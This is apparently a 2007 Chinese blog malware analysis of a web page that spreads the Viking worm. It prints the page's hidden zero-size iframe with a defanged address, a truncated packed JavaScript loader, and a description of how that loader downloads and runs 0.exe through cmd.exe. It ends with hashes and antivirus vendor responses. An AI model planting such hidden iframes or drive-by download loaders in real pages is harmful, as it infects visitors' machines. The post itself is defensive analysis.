03-19/一个传播 Worm.Win32.Viking.jg的 网页,解密有点难度(第2版)
endurer 原创
2007-03-19 第2版 补充瑞星的反应
2007-03-18 第1版
该网页包含代码:
/---
<iframe src="hxxp://www.54***69*9.com/wm***/2***0/1**.htm" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://www.54***69*9.com/wm***/2***0/1**.htm 包含代码:
/---
<script src=css.js></script>
---/
hxxp://www.54***69*9.com/wm***/2***0/css.js 的内容为 JavaScript代码:
/---
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'//w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('//b'+e(c)+'//b','g'),k[c]);return p;}('Z("//l//v……(略)……110|114'.split('|'),0,{}))
---/
解密结果为 一段JavaScript脚本代码,主要功能是运行自定义函数 gn(n),利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 0.exe,保存为 %windir%/~tmp.tmp,
并利用Shell.Application 对象 Q 的 ShellExecute 方法执行命令:%windir%/system32/cmd.exe /c %windir%/~tmp.tmp 来运行。
文件说明符 : D:/test/0.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-18 21:11:10
修改时间 : 2007-3-18 21:11:13
访问时间 : 2007-3-18 21:11:41
大小 : 60573 字节 59.157 KB
MD5 : ae94cf26d3cf1ddfec5acd7270045e54
Kaspersky报为:Worm.Win32.Viking.jg
| 主 题: | 病毒上报邮件分析结果-流水单号:6144801 | ||
| 发件人: | "" <[email protected]> | ||
您的邮件已经收到,感谢您对瑞星的支持。
我们已经详细分析过您的问题和文件,以下是您上传的文件的分析结果:
1.文件名:0.exe
病毒名: Worm.Viking.pk
我们将在较新的19.15.10版本(瑞星2006的18.71.10版本)中处理解决,请您届时将您的瑞星软件升级到19.15.10(瑞星2006的18.71.10版本)版本并且打开监控中心全盘杀毒。如果我们在测试过程中发现问题的话,我们会推迟一到两版本后升级。